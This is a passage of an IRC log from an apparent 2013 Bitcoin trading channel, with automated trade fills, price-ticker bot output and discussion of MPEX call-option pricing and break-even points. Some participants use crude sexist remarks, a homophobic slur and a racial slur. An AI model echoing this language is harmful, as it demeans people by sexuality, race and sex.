23:06:22 How can I be of assistance, my poor man? Apr 09 23:06:27 ^ Apr 09 23:06:33 ;) Apr 09 23:06:41 [MPEX] [S.BBET] 10000 @ 0.0015 = 15 BTC [+] Apr 09 23:06:43 [MPEX] [S.BBET] 10000 @ 0.00189999 = 18.9999 BTC [+] Apr 09 23:06:45 [MPEX] [S.BBET] 5000 @ 0.00194999 = 9.75 BTC [+] Apr 09 23:06:47 shit, mp you could buy a couple good hookers with that Apr 09 23:06:56 yeah. Apr 09 23:07:07 what do you do with all that anyway? Apr 09 23:07:12 nothing lol Apr 09 23:07:23 problem with being rich. fucking numbers on the screen Apr 09 23:07:25 Buy a beach house in bora bora Apr 09 23:07:31 i don't like the beach Apr 09 23:07:36 or bora bora Apr 09 23:07:43 Buy a ski resort in Alaska Apr 09 23:07:53 meh. i kinda like eastern europe tbh. Apr 09 23:07:58 white skinny chicks. Apr 09 23:08:00 Buy europe Apr 09 23:08:09 at this rate i might buy sweden Apr 09 23:08:13 cyprus! Apr 09 23:08:24 too turkish Apr 09 23:08:31 [BTCTC] [BASIC-MINING] 10 @ 0.395 = 3.95 BTC [-] Apr 09 23:08:33 make them use BTC Apr 09 23:08:40 the turks ? they'll break it Apr 09 23:08:44 heh Apr 09 23:09:02 next thing we will see is photos of mp with the princess of Sweden Apr 09 23:09:05 [HAVELOCK] [SDICE] 1 @ 0.221 BTC [+] Apr 09 23:09:07 is she hawt ? Apr 09 23:09:15 from what I remember Apr 09 23:09:22 a couple years ago.. Apr 09 23:09:28 http://www.nhlsnipers.com/wp-content/uploads/2010/04/princess-madeleine.jpg Apr 09 23:09:31 "did you say mp?" Apr 09 23:10:18 lol, you need to bang Maria Sharapove Apr 09 23:10:21 a Apr 09 23:10:30 that would be top on my list Apr 09 23:10:58 [BTCTC] [BASIC-MINING] 17 @ 0.4 = 6.8 BTC [+] Apr 09 23:11:19 ya think ? Apr 09 23:11:23 okay bitbet like heres the deal Apr 09 23:11:25 i don't go for this famous angle so much Apr 09 23:11:29 i bought sweden, sorry Apr 09 23:11:38 for example that $200 bet, people who bet right at the beginning got 1.2 odds Apr 09 23:11:39 Lyspooner was it wortyh it ? Apr 09 23:11:43 naw, she just goes after balls with such effort Apr 09 23:11:45 the people who came in in the end got 1.1 Apr 09 23:12:01 i don't know, i'm trying to get julian assange sprung so we can go there together Apr 09 23:12:04 not really fair, but i understand how it can be hard to implement Apr 09 23:12:21 taub yeah i dare go on a limb and say it's not so common this stuff. Apr 09 23:12:33 but im not so sure it's not fair. Apr 09 23:15:01 mircea: is this month going to be another painful one? Apr 09 23:15:28 that we'll know at the end. Apr 09 23:16:02 are you bearish on btc? Apr 09 23:16:06 nah Apr 09 23:16:24 how'd you get put in a position to lose money on an increase? Apr 09 23:16:44 or was it the wild swing? Apr 09 23:17:03 well yes. who else do you know who can maintain a 500k BTC notional exposure ? Apr 09 23:18:12 not i. i just wonder what i'm missing between you not being bearish and losing on an increase in price. Apr 09 23:18:29 perhaps i should read more. Apr 09 23:18:33 i'm passive. do you understnad how mpoe options work ? Apr 09 23:18:51 yes. i didn't think you were passive. Apr 09 23:19:00 well as a lender of last resort to the bot Apr 09 23:19:08 if the exposure is laerger than what bonds cover Apr 09 23:19:21 i can end up either long or short BTC on that book, depending what people did Apr 09 23:19:38 i see. Apr 09 23:19:51 so it's the pop that will make you smile. Apr 09 23:19:58 not necessarily. Apr 09 23:20:25 if i carry a lot (a lot!) of sold calls on the book and price goes up then i can hurt. if it doesn't then mpex makes bank Apr 09 23:20:28 vice-versa with puts. Apr 09 23:20:37 if there's not a lot of exposure i don't really care either way Apr 09 23:21:05 a scary position to be in if a bigger shark comes along. Apr 09 23:21:35 your balls must be made of steel. Apr 09 23:21:49 eh, how big is this shark going to be. Apr 09 23:22:43 i have no idea. i'm always impressed with how the idea is catching on. i heard roseanne barr owns bitcoins now. Apr 09 23:22:59 coinbr deposits flushed Apr 09 23:23:07 mircea_popescu: couldn't you adjust the algorithm to take your exposure into account, raising the cost of calls if you are short tons of calls... seems like a possible way of increasing your value extraction and biasing the pricing to encourage a reduction of your own exposure, while still market making Apr 09 23:23:30 if people still want to pay more for calls, you give them the option, but you just charge more for it Apr 09 23:23:49 yes Apr 09 23:23:54 i know i personally would like to be in control of which way my exposure was swayed... Apr 09 23:23:55 i don't understand why people are so aggressed at the notion speculators made money. Apr 09 23:24:06 you know, s.dice loses every fgucking month about 50% of the bets made Apr 09 23:24:10 I have NO PROBLEM with the current state Apr 09 23:24:16 why shouldn't option gholders make bank if they;re right ? Apr 09 23:24:27 they should Apr 09 23:24:31 of course Apr 09 23:24:32 so they have. Apr 09 23:24:32 +1 Apr 09 23:24:35 haters gon' hate Apr 09 23:24:37 people just care about you and your feelings Apr 09 23:24:42 $avg Apr 09 23:24:42 ThickAsThieves: 207.52 Apr 09 23:24:44 and don't want to see you hurt Apr 09 23:24:57 ;;ticker Apr 09 23:24:58 BTCUSD ticker | Best bid: 235.01000, Best ask: 236.00000, Bid-ask spread: 0.99000, Last trade: 235.00300, 24 hour volume: 108838.11631974, 24 hour low: 180.00000, 24 hour high: 240.11100, 24 hour vwap: 207.47966 Apr 09 23:25:00 I still dont fully understand the options, I had it figured out once, but now its back to being foreign to me. Apr 09 23:25:08 Bugpowder i c :) Apr 09 23:25:29 i am just surprised you would take the passive approach. Apr 09 23:25:35 why ? Apr 09 23:25:56 because i wouldn't i guess. Apr 09 23:26:08 well ok, but we can't all be boys. Apr 09 23:26:18 I think it's awesome, he's sacrificing for the "greater good" of bitcoin Apr 09 23:26:19 you all daytraders gotta have a socket to plug your daytrading tool into Apr 09 23:26:47 :] Apr 09 23:26:59 no daytrading but trendtrading sure. Apr 09 23:27:10 lol Apr 09 23:27:23 if you think btc will be $1,000, seems odd to not take a side on that. Apr 09 23:27:54 he has the correct side on, i'm sure Apr 09 23:27:54 i think you might want to read up on how mpex works Apr 09 23:27:56 i think people are basically saying that the market is super biased in one direction...it doesn't take a lot of skill to guess up Apr 09 23:27:58 OgNasty my stake of various btc businesses is easy over 500k btc. Apr 09 23:28:02 how do i not have a stake ? Apr 09 23:28:05 but i respect that you are more of an architect than a player. Apr 09 23:28:21 [BTCTC] [ASICMINER-PT] 1 @ 0.7798 BTC [+] Apr 09 23:28:27 [BTCTC] [ASICMINER-PT] 1 @ 0.7798 BTC [+] Apr 09 23:28:33 [BTCTC] [ASICMINER-PT] 2 @ 0.7799 = 1.5598 BTC [+] Apr 09 23:28:42 dude's got more play in his pinky than an architect has blueprints in his balls Apr 09 23:28:42 *reads scrollback* lol chan suddenly full of tight-assed mpoe bondholders Apr 09 23:28:58 lol Lyspooner didn't know you were a fan Apr 09 23:29:00 OgNasty: you still got those minirigs on order? Apr 09 23:29:07 I dont think hes sacrificing anything, I think hes making a killing and getting to look like the big boy at the same time. Apr 09 23:29:12 Hes got you all fooled! Apr 09 23:29:14 :) Apr 09 23:29:18 lots of sc Apr 09 23:29:28 [MPEX] [O.USD.C188T] 10 @ 0.25604244 = 2.5604 BTC [+] Apr 09 23:29:32 Doffx you shall now be exiled out of the happy chan Apr 09 23:29:33 who's being fooled? Apr 09 23:29:38 haha Apr 09 23:29:50 into the chan of eternal torment with you. Apr 09 23:29:56 bondholders are faggots Apr 09 23:30:01 Doffx: It was that way till last month Apr 09 23:30:34 Oh I have been around a long time, mircea_popescu has always been making a killing. Apr 09 23:30:48 Nice choice of strikes, mircea_popescu Apr 09 23:30:51 Long time as far as this channel is concerned anyhow. Apr 09 23:31:14 it's hard not to be making a killing when the price is going up 20% per day. Apr 09 23:31:31 Speaking of which... What, no new high yet? It's been like 2 hours... Bitcoin y u no bubble no mo? Apr 09 23:31:32 yeah, but he did it when btc was 4-5$, hes no dummy. Apr 09 23:31:47 Lyspooner yeah it looks like fucking pasta. Apr 09 23:31:57 ;;ticker Apr 09 23:31:58 BTCUSD ticker | Best bid: 234.53656, Best ask: 235.00000, Bid-ask spread: 0.46344, Last trade: 235.00000, 24 hour volume: 108850.07227890, 24 hour low: 180.00000, 24 hour high: 240.11100, 24 hour vwap: 207.55397 Apr 09 23:32:07 [BTCTC] [GSDPT] 10 @ 0.00241 = 0.0241 BTC [-] Apr 09 23:32:11 [BTCTC] [GSDPT] 19 @ 0.0024 = 0.0456 BTC [-] Apr 09 23:32:34 i love going by all these abandoned sites with btc frozen prices Apr 09 23:32:45 like... our tea! only 1.5 btc! Apr 09 23:33:06 [BTCTC] [PAJKA.BOND] 1 @ 0.09869 BTC [+] Apr 09 23:33:36 [MPEX] [O.USD.C230T] 10 @ 0.17622044 = 1.7622 BTC [+] Apr 09 23:33:55 http://static.rtbtc.net:8080/img/bitvps_20120509.png Apr 09 23:33:59 mircea_popescu: are you okay with me putting the "pls make calls more expesive" convo on btctalk Apr 09 23:34:05 and washing my hands over it? Apr 09 23:34:07 :D Apr 09 23:34:12 lol. sure Apr 09 23:34:22 $40 a pound! http://bitbrew.net/fabulous-french-roast/ Apr 09 23:34:45 [MPEX] [O.USD.C206T] 20 @ 0.23438962 = 4.6878 BTC Apr 09 23:35:21 unbalanced_: we have topped for the day Apr 09 23:35:46 need more capital to be flushed in Apr 09 23:36:10 [MPEX] [O.USD.C203T] 20 @ 0.24277853 = 4.8556 BTC Apr 09 23:36:53 kakobrekla, the funny part about the bitvps is I helped him clean that add up, he paid me 5 btc and I gave 30$ usd to the artist that did it. Apr 09 23:36:55 [MPEX] [O.USD.C209T] 20 @ 0.22626342 = 4.5253 BTC Apr 09 23:37:07 [MPEX] [O.USD.C212T] 20 @ 0.21839445 = 4.3679 BTC Apr 09 23:37:07 :)) Apr 09 23:37:57 I think I should ask if he would pay me 5 more btc to have it updated. Apr 09 23:38:09 where is rg anyhow Apr 09 23:38:21 rg has vanished Apr 09 23:38:36 [MPEX] [O.USD.C215T] 20 @ 0.21077537 = 4.2155 BTC [+] Apr 09 23:38:41 no more rg Apr 09 23:38:45 so weird, he got out of btc like a month before btc kicking ass Apr 09 23:38:51 bad move of all time./ Apr 09 23:39:03 Odd for sure. Apr 09 23:39:05 well the profits are in USD anyway... Apr 09 23:39:19 and price in BTC moves according to USD/BTC rate Apr 09 23:39:21 [MPEX] [O.USD.C218T] 20 @ 0.20340016 = 4.068 BTC Apr 09 23:39:24 Namworld site aside. i recall him since 2011 Apr 09 23:39:25 So doesn't change much Apr 09 23:39:29 he was in here for years Apr 09 23:39:34 15, 2, 5 etc Apr 09 23:39:42 then a month before 200+ he's goine Apr 09 23:39:48 yeah... Apr 09 23:40:10 some people are born lucky Apr 09 23:40:10 some... are not Apr 09 23:40:36 rg has been active in -otc, he's into ltc now i guess. Apr 09 23:40:45 lol Apr 09 23:40:52 liteVPS Apr 09 23:40:52 if anyone notices rg dissapear from ltc Apr 09 23:40:54 let me know pls. Apr 09 23:42:22 (23:08) <+rg> thats wy im here Apr 09 23:42:23 (23:08) <+rg> i got $9k in LTC burning a hole in my pocket Apr 09 23:42:33 from lastnight Apr 09 23:42:42 *shrug* Apr 09 23:42:52 he was selling btc in there too Apr 09 23:43:22 he should still have a decent stack, used to be one of the bigger miners Apr 09 23:43:32 You can always count on irc to be logging your every word! :) Apr 09 23:43:38 yea he was eaerly mining it i recall Apr 09 23:43:46 [BTCTC] [SYNERGY] 1 @ 0.00651 BTC [-] Apr 09 23:44:26 [BTCTC] [SYNERGY] 1 @ 0.00651 BTC [-] Apr 09 23:44:40 ;;ticker Apr 09 23:44:42 BTCUSD ticker | Best bid: 234.02395, Best ask: 235.89700, Bid-ask spread: 1.87305, Last trade: 235.89700, 24 hour volume: 107728.29325338, 24 hour low: 180.00000, 24 hour high: 240.11100, 24 hour vwap: 207.93552 Apr 09 23:44:49 not that early but he had 60GH of stolen supercomputer (according to him) when most miners where <10GH Apr 09 23:45:17 https://bitcointalk.org/index.php?topic=131270.msg1786288#msg1786288 ... and lol, that C215T is in money already Apr 09 23:45:18 [BTCTC] [SYNERGY] 1 @ 0.006501 BTC [-] Apr 09 23:46:04 i like rg for the most part. and I liked how he was helpful to most newbs in -otc. just too bad that bvps ended the way it did :/ Apr 09 23:46:12 [BTCTC] [SYNERGY] 4 @ 0.0065 = 0.026 BTC [-] Apr 09 23:46:25 BitVPS didn't end =/ Apr 09 23:46:40 err, yea sorry Namworld ... Apr 09 23:46:49 im refering to its delisting on mpex Apr 09 23:46:53 Just RG and his helpfulness being around Apr 09 23:46:58 oh, that. Yeah Apr 09 23:47:29 ;;asks 99999999 Apr 09 23:47:29 There are currently 39007.734 bitcoins offered at or under 99999999.0 USD, worth 502431927.952 USD in total. | Data vintage: 21.4332 seconds Apr 09 23:47:35 ;;bids 0 Apr 09 23:47:35 There are currently 32135254 bitcoins demanded at or over 0.0 USD, worth 14598746.1341 USD in total. | Data vintage: 25.8648 seconds Apr 09 23:47:46 Bug are you SURE the rally is over today? Apr 09 23:48:00 http://www.bitvps.com/img/120x90-1.png Apr 09 23:48:13 The probable new banner to replace the 1 BTC banner Apr 09 23:48:55 ;;market --sell 3500 Apr 09 23:48:55 A market order to sell 3500 bitcoins right now would net 808104.7174 USD and would take the last price down to 225.9800 USD, resulting in an average price of 230.8871 USD/BTC. | Data vintage: 106.8866 seconds Apr 09 23:49:05 how's it goin anyway Namworld? Apr 09 23:49:20 BitVPS? Apr 09 23:49:22 ya Apr 09 23:49:26 Doing ok... Apr 09 23:49:37 Been a money sinkhole... Apr 09 23:49:41 xD Apr 09 23:49:50 Shouldn't be for much longer tho Apr 09 23:50:31 [MPEX] [O.USD.C188T] 25 @ 0.264 = 6.6 BTC [+] Apr 09 23:51:29 ThickAsThieves: Not sure about anything... but the oscillation is damping down. bid volume is down. I think we need another bolus of wires to push it... Maybe when Japan gets up. Apr 09 23:51:41 Or China Apr 09 23:52:57 I'm assuming Japan is more relevant due to the exchange being located there, not sure how the deposit flushing works at gox. Apr 09 23:53:09 ah jes Apr 09 23:53:15 The ToS says I can't run a miner, which makes sense. Wallet hosting is ok though? Apr 09 23:53:19 it does look like about 3000 new coins for sale Apr 09 23:53:31 I saw talk on the wall watcher thread about China on Sunday Apr 09 23:53:40 mod6: yeah Apr 09 23:54:01 ok thanks! Apr 09 23:54:32 [MPEX] [O.USD.C260T] 500 @ 0.12286079 = 61.4304 BTC [+] Apr 09 23:55:22 ;;calc 260/(1-0.12286079) Apr 09 23:55:22 296.418170612 Apr 09 23:55:32 anyone wants some C200? Apr 09 23:56:05 I'll sell some 137s Apr 09 23:56:12 or 104s Apr 09 23:56:16 at midmarket Apr 09 23:56:19 list em Apr 09 23:56:23 and we'll see Apr 09 23:56:23 if anyone is interested Apr 09 23:56:39 ok well I'm out Apr 09 23:58:05 Ugg, just read a site aout options that finally made sense to me. Apr 09 23:58:28 As usual I was over complicating the why. Apr 10 00:00:25 i wonder how much potential money was lost waiting for that deposit Apr 10 00:00:37 many of those options are already in the money Apr 10 00:00:48 tens of thousands of $? Apr 10 00:03:10 try complaining to your bank how much you lost due to them "delaying" a wire Apr 10 00:03:27 i'm interested what they'll say. Apr 10 00:04:52 not that simple, i could debate more relevant angles, but i'm not interested in arguing I guess Apr 10 00:05:01 whats done is done Apr 10 00:05:07 i'll adjust my future behavior Apr 10 00:05:14 to reduce this risk Apr 10 00:05:54 It's taken me a while but I am learning to plan ahead to get BTC where I need 'em before I need 'em. Apr 10 00:06:10 its not always thats imple though Apr 10 00:06:16 when you day trade Apr 10 00:06:27 or arb, yeah Apr 10 00:06:30 yeah Apr 10 00:06:38 jurov, I appreciate you helping out on the transfers as you have mentioned here before Apr 10 00:07:24 (I'm a small fish compared to some of the whales around here though.) Apr 10 00:08:25 um, okay, it's not exactly helping, rather basic business operation Apr 10 00:09:33 what I like about this rally is the deafening silence of the 'cryptoanarchist' brigade Apr 10 00:10:00 hm? Apr 10 00:10:04 they became rich and are disgusted of thmeselves? Apr 10 00:10:17 'down with the state! eat the rich! oh shit nigga im rich? break out the crystal' Apr 10 00:10:20 [BTCTC] [BTC-BOND] 116 @ 0.010246 = 1.1885 BTC [+] Apr 10 00:10:24 [BTCTC] [BTC-BOND] 1 @ 0.010246 BTC [+] Apr 10 00:10:52 or just the media attention completely deafened anything other Apr 10 00:11:02 they probably sold at 12 Apr 10 00:11:09 jurov, that's what I mean, when you're around you do what you can to expedite. But you gotta sleep sometime. Apr 10 00:11:15 [BTCTC] [BTC-BOND] 15 @ 0.010247 = 0.1537 BTC [+] Apr 10 00:11:17 my mother said today "oh yes i'm seeing bitcoins everywhere" Apr 10 00:11:17 or traded their coins for stuff on SR. Apr 10 00:11:26 i was like what? where? Apr 10 00:11:41 and there are supposedly some billboards with bitcoins around Apr 10 00:11:46 [BTCTC] [PAJKA.BOND] 1 @ 0.0987 BTC [+] Apr 10 00:11:49 [BTCTC] [PAJKA.BOND] 2 @ 0.0988 = 0.1976 BTC [+] Apr 10 00:11:53 [BTCTC] [PAJKA.BOND] 1 @ 0.0989 BTC [+] Apr 10 00:11:54 i hope she's exaggerating Apr 10 00:11:56 [BTCTC] [PAJKA.BOND] 2 @ 0.099 = 0.198 BTC [+] Apr 10 00:12:03 [BTCTC] [PAJKA.BOND] 20 @ 0.1 = 2 BTC [+] Apr 10 00:12:37 [MPEX] [O.USD.C248T] 400 @ 0.14696244 = 58.785 BTC [+] Apr 10 00:12:53 [MPEX] [S.MPOE] 1818 @ 0.00071199 = 1.2944 BTC [+] Apr 10 00:12:55 [MPEX] [S.MPOE] 10482 @ 0.000712 = 7.4632 BTC [+] Apr 10 00:12:57 [BTCTC] [SYNERGY] 1 @ 0.01799 BTC [+] Apr 10 00:13:00 [BTCTC] [SYNERGY] 5 @ 0.018 = 0.09 BTC [+] Apr 10 00:13:05 [BTCTC] [SYNERGY] 20 @ 0.01899 = 0.3798 BTC [+] Apr 10 00:13:17 [MPEX] [O.USD.C200T] 200 @ 0.25859901 = 51.7198 BTC [+] Apr 10 00:13:24 [BTCTC] [BTC-BOND] 61 @ 0.010248 = 0.6251 BTC [+] Apr 10 00:13:53 [BTCTC] [PAJKA.BOND] 2 @ 0.10099 = 0.202 BTC [+] Apr 10 00:13:55 [MPEX] [O.USD.C203T] 30 @ 0.24982555 = 7.4948 BTC [+] Apr 10 00:13:57 [BTCTC] [PAJKA.BOND] 28 @ 0.101 = 2.828 BTC [+] Apr 10 00:14:07 [MPEX] [O.USD.C185T] 170 @ 0.30659469 = 52.1211 BTC [+] Apr 10 00:14:17 [MPEX] [S.DICE] 1442 @ 0.0027 = 3.8934 BTC [-] Apr 10 00:14:22 dub heh Apr 10 00:14:30 [MPEX] [O.USD.C209T] 30 @ 0.23306651 = 6.992 BTC [+] Apr 10 00:14:50 [MPEX] [O.USD.C155T] 100 @ 0.42471172 = 42.4712 BTC [+] Apr 10 00:15:38 [MPEX] [O.USD.C215T] 30 @ 0.2173294 = 6.5199 BTC [+] Apr 10 00:16:34 random ass call buyer Apr 10 00:16:49 not al the same person Apr 10 00:19:02 dub, it's "cristal" Apr 10 00:19:22 and i don't see why a cryptoanarchist can't enjoy champagne Apr 10 00:19:43 [BTCTC] [PAJKA.BOND] 23 @ 0.101 = 2.323 BTC [+] Apr 10 00:19:51 [BTCTC] [PAJKA.BOND] 3 @ 0.101 = 0.303 BTC [+] Apr 10 00:20:02 cryptoanarchist + veuve clicquot = ? Apr 10 00:20:34 Lyspooner: thanks for that Apr 10 00:20:46 no probs Apr 10 00:20:50 never actually seen any cristal taht i can recall Apr 10 00:21:03 not popular here Apr 10 00:21:06 [HAVELOCK] [SDICE] 20 @ 0.16 = 3.2 BTC [-] Apr 10 00:21:08 [BTCTC] [BTC-BOND] 500 @ 0.01025 = 5.125 BTC [+] Apr 10 00:21:32 [BTCTC] [SYNERGY] 1 @ 0.01999 BTC [+] Apr 10 00:21:36 [BTCTC] [SYNERGY] 6 @ 0.019999 = 0.12 BTC [+] Apr 10 00:21:39 [BTCTC] [SYNERGY] 16 @ 0.02 = 0.32 BTC [+] Apr 10 00:21:42 [BTCTC] [SYNERGY] 3 @ 0.02 = 0.06 BTC [+] Apr 10 00:21:43 the owner of the company that produces cristal said something bad about black people, like, "i wish they wouldn't be drinking my champagne" Apr 10 00:21:59 [BTCTC] [PAJKA.BOND] 33 @ 0.1019 = 3.3627 BTC [+] Apr 10 00:22:04 [BTCTC] [PAJKA.BOND] 2 @ 0.1019 = 0.2038 BTC [+] Apr 10 00:22:06 [HAVELOCK] [SDICE] 1 @ 0.15 BTC [-] Apr 10 00:22:07 [HAVELOCK] [SDICE] 3 @ 0.15 = 0.45 BTC [-] Apr 10 00:22:18 rappers, yeah... snob got schooled Apr 10 00:23:05 [HAVELOCK] [SDICE] 1 @ 0.125 BTC [-] Apr 10 00:23:08 [BTCTC] [ASICMINER-PT] 8 @ 0.7799 = 6.2392 BTC [+] Apr 10 00:24:16 whoa Apr 10 00:24:19 sdice Apr 10 00:25:02 jeez that fell fast Apr 10 00:25:38 no wonder when topace allows sdice transfers in only one direction Apr 10 00:25:59 the other direction is "allowed" for 10BTC fee Apr 10 00:28:03 btw if anyone is interested to split the fee let me know Apr 10 00:28:28 er... but transfers between accounts are prolly 10btc too... no help here Apr 10 00:30:10 tiberiusiv the troll Apr 10 00:30:11 23,800 yen to buy a bitcoin Apr 10 00:30:37 he be trollin, he be hatin, trynna rob us dirty Apr 10 00:30:47 [MPEX] [S.DICE] 2750 @ 0.0027 = 7.425 BTC [-] Apr 10 00:32:49 that is super low on havelock Apr 10 00:32:58 you know that cristal stuff isn't all that grand. Apr 10 00:33:42 I bought a bottle once, it was shitty Apr 10 00:37:03 ;;ticker Apr 10 00:37:04 BTCUSD ticker | Best bid: 237.00000, Best ask: 237.10000, Bid-ask spread: 0.10000, Last trade: 237.10000, 24 hour volume: 101568.77369191, 24 hour low: 183.00000, 24 hour high: 240.11100, 24 hour vwap: 210.66450 Apr 10 00:41:22 jurov: fee reduced to 1BTC Apr 10 00:41:30 topace|2: thx Apr 10 00:42:07 10btc is rediculous at todays rates Apr 10 00:51:01 mircea_popescu: are you still around? Apr 10 00:51:06 [MPEX] [S.DICE] 480 @ 0.0027 = 1.296 BTC [-] Apr 10 00:52:05 [HAVELOCK] [VTX] 3 @ 0.24 = 0.72 BTC [-] Apr 10 00:54:18 for sale: 175 ASICMINER shares (not pass-thru) @ 0.75 BTC Apr 10 00:54:27 (typing up forum post now) Apr 10 00:56:06 [HAVELOCK] [KCIM] 2 @ 1.145 = 2.29 BTC [+] Apr 10 00:56:33 [MPEX] [S.DICE] 400 @ 0.0027 = 1.08 BTC [-] Apr 10 00:57:05 [HAVELOCK] [SDICE] 4 @ 0.222 = 0.888 BTC [+] Apr 10 01:00:06 [HAVELOCK] [VTX] 10 @ 0.221 = 2.21 BTC [-] Apr 10 01:01:05 [HAVELOCK] [HIM] 5 @ 1.101 = 5.505 BTC [-] Apr 10 01:01:34 yea Apr 10 01:02:06 [HAVELOCK] [VTX] 27 @ 0.221 = 5.967 BTC [-] Apr 10 01:02:15 Bugpowder sup Apr 10 01:06:41 I wuz thinking of depositing some more coin Apr 10 01:07:00 wanted to see if I could get a quick flush when it comes in Apr 10 01:07:52 at the rate mining has been going that'll be tomorrow anyway Apr 10 01:10:06 [HAVELOCK] [SDICE] 4 @ 0.222 = 0.888 BTC [+] Apr 10 01:10:13 [MPEX] [S.DICE] 400 @ 0.0027 = 1.08 BTC [-] Apr 10 01:13:05 [HAVELOCK] [SDICE] 4 @ 0.23 = 0.92 BTC [+] Apr 10 01:13:14 [MPEX] [S.DICE] 400 @ 0.00277899 = 1.1116 BTC [+] Apr 10 01:15:06 ;;bids Apr 10 01:15:07 (bids [--under] ) -- Calculate the amount of bitcoin demanded at or over . If '--under' option is given, find coins or at or under . Apr 10 01:15:10 ;;ticker Apr 10 01:15:11 BTCUSD ticker | Best bid: 237.25000, Best ask: 237.45900, Bid-ask spread: 0.20900, Last trade: 237.46000, 24 hour volume: 98777.78340359, 24 hour low: 184.58200, 24 hour high: 240.11100, 24 hour vwap: 211.72212 Apr 10 01:17:29 mircea_popescu: If you wouldn't mind flushing my deposit, I'd appreciate it. tx Apr 10 01:17:39 check first Apr 10 01:18:41 werd Apr 10 01:18:41 up Apr 10 01:18:43 tx Apr 10 01:20:04 its the code word Apr 10 01:20:25 no matter where you say it, you know that you'll be heard Apr 10 01:20:47 [MPEX] [O.USD.C122T] 20 @ 0.539 = 10.78 BTC [+] Apr 10 01:21:25 [MPEX] [O.USD.C119T] 5 @ 0.55 = 2.75 BTC [+] Apr 10 01:22:10 [MPEX] [O.USD.C110T] 40 @ 0.605 = 24.2 BTC [+] Apr 10 01:22:29 [MPEX] [O.USD.C107T] 30 @ 0.625 = 18.75 BTC [+] Apr 10 01:23:26 [MPEX] [O.USD.C101T] 55 @ 0.65 = 35.75 BTC [+] Apr 10 01:24:30 thank you whoever bought those :) Apr 10 01:24:38 whomever* Apr 10 01:27:47 [BTCTC] [BASIC-MINING] 1 @ 0.4 BTC [+] Apr 10 01:28:23 ME Apr 10 01:28:27 [MPEX] [O.USD.C095T] 20 @ 0.68 = 13.6 BTC [+] Apr 10 01:28:29 midmarket actuion Apr 10 01:28:31 action! Apr 10 01:32:06 [HAVELOCK] [KCIM] 2 @ 1.145 = 2.29 BTC [+] Apr 10 01:33:29 wouldnt it be better to buy higher strike price options? Apr 10 01:33:39 diminishing returns on those, no? Apr 10 01:33:55 where are they? Apr 10 01:34:05 ? Apr 10 01:34:59 (15:33) < ThickAsThieves> diminishing returns on those, no? << if the price of the underlying continues to rise, so should the CALLs regardless of strike Apr 10 01:35:00 are you selling higher strikes? Apr 10 01:35:10 well, have to figure in theta tho Apr 10 01:35:10 no i meant, Apr 10 01:35:11 I didn't see them Apr 10 01:35:20 bot options Apr 10 01:35:21 and other greeks heheh Apr 10 01:35:23 I only bought cause they were midmarket Apr 10 01:35:37 right, theyll be in the money at 265 or so Apr 10 01:35:42 safer bet Apr 10 01:36:03 fuck someone had to chose this night for pentesting coinbr Apr 10 01:36:15 getting flooded by error reports Apr 10 01:38:11 175 direct ASICMINER shares for sale: https://bitcointalk.org/index.php?topic=171800.0 Apr 10 01:38:11 Bug, lets take the [MPEX] [O.USD.C110T] 40 @ 0.605 = 24.2 BTC for example Apr 10 01:38:23 thats is break even at like 275 Apr 10 01:39:14 but even if price rises to 350 Apr 10 01:39:22 you only make .08 ea right? Apr 10 01:41:27 whereas Apr 10 01:41:43 the break even on the bots C200T Apr 10 01:41:45 is lower Apr 10 01:42:30 seems we're dropping a little. Apr 10 01:43:47 so you'd only need price to hit 275 to make the same .08 Apr 10 01:43:55 or is my math off? Apr 10 01:44:56 sorry Apr 10 01:45:01 not 275, 303 Apr 10 01:45:45 seems not 275 303 would be a big deal Apr 10 01:46:13 but i'm comparing to 350 Apr 10 01:46:18 also a big deal Apr 10 01:46:48 benkay Apr 10 01:46:55 a Apr 10 01:47:45 the curves are steeper the higher out you go in strike Apr 10 01:47:59 and have a 0 point crossever further out Apr 10 01:48:06 I don't really care what the curves look like Apr 10 01:48:22 I just try buy the best 'deal' Apr 10 01:48:32 is that the best approach though? Apr 10 01:48:33 your options were 8% under the bot price Apr 10 01:48:38 your break even is still 275 Apr 10 01:48:43 is it though? Apr 10 01:48:54 for the example one Apr 10 01:49:21 I don't know where there price will go Apr 10 01:49:29 but deep ITM calls are less risky Apr 10 01:49:36 in terms of % losses Apr 10 01:49:44 if the price doesn't move Apr 10 01:50:03 you'll lose less? Apr 10 01:51:04 If mircea_popescu programmed his bot right, which I assume he did, the average EV of each strike should be roughly equal, given the population distribution of future price expectations Apr 10 01:51:36 Thus, if a few strikes are priced 8% cheaper than others, I should buy those Apr 10 01:51:39 what sort of throwing in the towel is this Apr 10 01:51:52 you're supposed to find all sorts of bot errors and whatnot Apr 10 01:51:55 unless I KNOW where the market is going to go Apr 10 01:52:14 and nobody knows Apr 10 01:52:47 dinnertime Apr 10 01:53:46 okay so in summary, what you bought breaks even at 275, and the break even for C200 is lower, yet what you bought is better? Apr 10 01:54:06 the break even for c200 is lower??? Apr 10 01:54:44 ;;calc 200/(1-0.26400071) Apr 10 01:54:45 271.739392575 Apr 10 01:54:48 yep Apr 10 01:54:56 welllllll Apr 10 01:54:59 that sux Apr 10 01:55:15 ;;calc 110 / .395 Apr 10 01:55:15 278.481012658 Apr 10 01:55:19 heh Apr 10 01:55:32 I blame mircea_popescu Apr 10 01:55:38 i blame math Apr 10 01:56:17 I should really automate this analysis Apr 10 01:57:48 seems a dubious way to go about things. Apr 10 01:58:06 the otm one breaks even slightly earlier, but the itm one spends a lot longer itm Apr 10 01:58:21 I yah Apr 10 01:58:23 you need to add the entire area Apr 10 01:58:28 yah, we should plot the curves. Apr 10 01:58:39 I used to have an excel sheet that did this Apr 10 01:58:50 maybe I will write a little matlab toolbox for MPEX options Apr 10 01:59:01 I should have done it months ago Apr 10 01:59:02 Namworld has it, no? Apr 10 01:59:14 yeah Apr 10 01:59:20 does his do plots? Apr 10 01:59:21 Nam's chart shows it decently Apr 10 01:59:27 just numbers Apr 10 01:59:32 but you can look at the % Apr 10 01:59:34 and see Apr 10 01:59:40 where diminshing returns show up Apr 10 01:59:48 I want to see the curves and EV Apr 10 01:59:51 its roughly at double value Apr 10 02:00:04 gotta run. Apr 10 02:00:16 232 is dead Apr 10 02:00:18 damn Apr 10 02:03:24 [BTCTC] [ASICMINER-PT] 1 @ 0.77969 BTC [-] Apr 10 02:04:44 ;;asks 232 Apr 10 02:04:47 There are currently 0 bitcoins offered at or under 232.0 USD, worth 0.0 USD in total. | Data vintage: 0.0013 seconds Apr 10 02:04:49 ;;ticker Apr 10 02:04:50 BTCUSD ticker | Best bid: 233.68090, Best ask: 234.00100, Bid-ask spread: 0.32010, Last trade: 233.36000, 24 hour volume: 104028.45730655, 24 